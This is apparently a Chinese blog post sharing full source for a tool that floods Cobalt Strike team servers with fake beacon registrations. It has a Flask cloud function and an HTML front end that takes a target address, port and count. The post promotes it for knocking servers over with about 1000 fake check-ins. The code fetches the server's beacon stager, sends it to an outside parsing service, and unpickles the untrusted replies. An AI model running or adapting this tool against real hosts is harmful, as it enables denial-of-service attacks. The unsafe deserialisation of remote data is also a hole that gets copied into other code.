cs上线器源码

使用

HW中用来dos效果还不错,上线1000个 差不多能D死了

云函数源码

import os
from flask import Flask, jsonify, render_template, request, url_for, send_from_directory
from werkzeug.utils import secure_filename
import argparse
import base64
import hashlib
import json
import os
import pickle
import re
import ssl
import subprocess
import tempfile
import zipfile
from urllib.parse import urlencode
from urllib.parse import urljoin

import urllib3

app = Flask(__name__)
EMPTY_UA_HEADERS = {}
URL_PATHS = {}

#@app.route("/")
#def index():
#    return render_template('index.html')

#@app.route("/users", methods=['GET', 'POST'])
#def users():
#    if request.method == 'POST':
#      print(request.form)
#      uid = request.form.get('uid');
#      user = {'uid': uid, 'name': 'test1'}
#      return jsonify(data=user)
#    else:
#      limit = request.args.get('limit')
#      data = {
#        'count': limit or 2,
#        'users': [{'name': 'test1'}, {'name': 'test2'}]
#      }
#      return jsonify(data=data)
http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE)
EMPTY_UA_HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"}
URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'}

IS_SERVERLESS = bool(os.environ.get('SERVERLESS'))
print(IS_SERVERLESS)
urllib3.disable_warnings()

def get_beacon_data(url, arch) -> bytes:
  http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE)
  EMPTY_UA_HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"}
  URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'}
  full_url = urljoin(url, URL_PATHS[arch])
  r = http.request('get', full_url, headers=EMPTY_UA_HEADERS, timeout=30)
  if r.status != 200:
      raise Exception("读取beacon失败..")
  buf = r.data
  return buf

def _parse_beacon_data(buf: bytes):
  http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE)
  EMPTY_UA_HEADERS = {"User-Agent": ""}
  URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'}
  b64 = base64.b64encode(buf).decode()
  data = {
      "buf": b64
  }
  api = "<https://i.hacking8.com/cobaltspam>"
  resp = http.request("POST", api, fields=data)
  if resp.status != 200:
      raise Exception("解析beacon数据失败")
  resp = resp.data.decode()
  resp = json.loads(resp)
  if resp["status"] == "error":
      raise Exception(resp["msg"])
  resp = base64.b64decode(resp["conf"])
  conf = pickle.loads(resp)
  return conf

def _register_beacon(a, b):
  http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE)
  EMPTY_UA_HEADERS = {"User-Agent": ""}
  URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'}
  b64 = base64.b64encode(a).decode()
  b = json.dumps(b)

  data = {
      "pubkey": b64,
      "meta": b
  }
  api = "<https://i.hacking8.com/cobaltspam>"
  resp = http.request("POST", api, fields=data)
  if resp.status != 200:
      raise Exception("生成数据失败")
  resp = resp.data.decode()
  resp = json.loads(resp)
  c = resp["conf"]
  c = base64.b64decode(c)
  r = pickle.loads(c)
  return r

def C2Server(url, option):
  res_info = []
  http = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE)
  EMPTY_UA_HEADERS = {"User-Agent": ""}
  URL_PATHS = {'x86': 'ab2g', 'x64': 'ab2h'}
  only_print = option == 1
  batch_size = option

  x86_beacon_buf = get_beacon_data(url, 'x86')
  ret = _parse_beacon_data(x86_beacon_buf)
  if not ret:
      x64_beacon_buf = get_beacon_data(url, 'x64')
      ret = _parse_beacon_data(x64_beacon_buf)
  if not ret:
      raise Exception
  conf = ret["conf"]
  print("获取Beacon信息成功！")
  for k, v in conf.items():
      print(k, ":", v)
  if only_print:
      return
  # Register new random beacon
  if conf['BeaconType'][0] == 'HTTP' or conf['BeaconType'][0] == 'HTTPS':
      pass
  else:
      print("BeaconType " + str(conf['BeaconType']) + " not yet supported! Quitting.")
      return
  index = 1
  while 1:
      r = _register_beacon(conf["PublicKey"], conf["HttpGet_Metadata"])
      for body, headers, params in r:
          if 'HostHeader' in conf:
              domain = re.search('Host: (.*)$', conf['HostHeader'], re.I)
              if domain:
                  headers['Host'] = domain.group(1).strip()
          _u = urljoin(
              conf['BeaconType'][0] + '://' + conf['C2Server'].split(',')[0] + ':' + str(conf['Port']),
              conf['C2Server'].split(',')[1])
          if params:
              _u += "?" + urlencode(params)
          req = http.request("GET", _u, body=body, headers=headers, timeout=30)
          if req.status == 200:
              res_info.append('上线成功! index:{}'.format(index))
              print('上线成功! index:{}'.format(index))
          else:
              #res_info.append("上线失败! index:{}".format(index))
              print("上线失败! index:{}".format(index))
          index += 1
          if index >= batch_size and batch_size < 999:
              res_info_json = {"info":res_info}
              return res_info_json
              # exit()

@app.route("/",methods = ["POST","GET"])
def chong():
  if request.method == "GET":
      return "helloword"
  elif request.method == "POST":
        data = json.loads(request.data)
        ipaddress = data['ipaddress']
        port = data['port']
        option = data['option']
        reslist = C2Server("{}:{}".format(str(ipaddress),str(port)), int(option)+1)
      #return "http://{}:{}".format(str(ip),str(port))
        # return render_template("res.html",reslist=reslist)
        return jsonify(reslist)
  else:
    return "fuck"

app.run(debug=True, port=9000, host='0.0.0.0')

oss中的index.html源码

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CS上线器</title>
    <style>
        .main_body {
            text-align: center;
        }
    </style>
    <!-- <link href="<https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css>" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous"> -->
    <!-- <script src="<https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/jquery/3.5.1/jquery.min.js>" type="application/javascript"></script> -->
    <!-- ZUI 标准版压缩后的 CSS 文件 -->
    <link rel="stylesheet" href="<https://cdn.bootcss.com/zui/1.9.2/css/zui.min.css>">

    <!-- ZUI Javascript 依赖 jQuery -->
    <script src="<https://cdn.bootcss.com/zui/1.9.2/lib/jquery/jquery.js>"></script>
    <!-- ZUI 标准版压缩后的 JavaScript 文件 -->
    <script src="<https://cdn.bootcss.com/zui/1.9.2/js/zui.min.js>"></script>

    <script type="text/javascript">
        // $(function() {
        //     // 点击按钮，触发加载动作
        //     $("#btn").click(function() {
        //         // 将comment.html加载进id为“resText”的元素里
        //         $("#resText").load("comment.html");
        //     });
        // })

        function go() {
            new $.zui.Messager('正在上线中，请稍等', {
                type: 'success',
                placement: 'top-right' // 定义显示位置
            }).show();
            var ipaddress = $('#ipaddress').val();
            var port = $('#port').val();
            var option = $('#option').val();
            var data_tmp = {
                "ipaddress": ipaddress,
                "port": port,
                "option": option
            };
            $.ajax({
                type: "POST",
                url: '<https://service-lr6wixak-1253722813.gz.apigw.tencentcs.com/release/>',
                // contentType: "application/json",
                dataType: "json",
                data: JSON.stringify(data_tmp),
                headers: {
                    'Content-Type': 'application/json'
                },
                success: function(data) {
                    // console.log(data);
                    var item = data.info;
                    for (var i = 0; i < item.length; i++) {
                        // console.log(item[i])
                        // console.log(item);
                        new $.zui.Messager(item[i], {
                            type: 'success',
                            placement: 'top-right' // 定义显示位置
                        }).show();
                    }

                },
                error: function(data) {
                    new $.zui.Messager('啊！不好意思，刚刚开小差了，或者你检查一下地址端口啥的？', {
                        type: 'warning',
                        placement: 'top-right' // 定义显示位置
                    }).show();
                }

            })
        }
    </script>
</head>

<body>

    <div class="main_body">
        <div class="alert alert-success with-icon container-fixed-xs" style="width: 26%;">
            <i class="icon-ok-sign "></i>
            <div class="content container-fixed-xs ">
                <h4>懂的都懂，填写地址直接</h4>
                <hr>
                <strong>冲！！</strong>
            </div>
        </div>
        <!-- <span class="label label-info">懂的都懂，填写地址直接</span> -->
        <!-- <font color="red" size="13">冲</font> -->

        <br>
        <div class="input-control has-label-left container-fixed-xs center-block " style="width: 26%;">
            <input id="ipaddress" type="text" class="form-control" placeholder="">
            <label for="ipaddress" class="input-control-label-left">CS地址:</label>
        </div>
        <br>
        <div class="input-control has-label-left container-fixed-xs center-block " style="width: 26%;">
            <input id="port" type="text" class="form-control" placeholder="">
            <label for="port" class="input-control-label-left">CS端口:</label>
        </div>
        <br>
        <div class="input-control has-label-left container-fixed-xs center-block " style="width: 26%;">
            <input id="option" type="text" class="form-control" placeholder="">
            <label for="option" class="input-control-label-left">上线数:</label>
        </div>
        <br>
        <button id="button" name="button" class="btn btn-warning" type="button" onclick="go()">给我冲！</button>
    </div>

</body>

</html>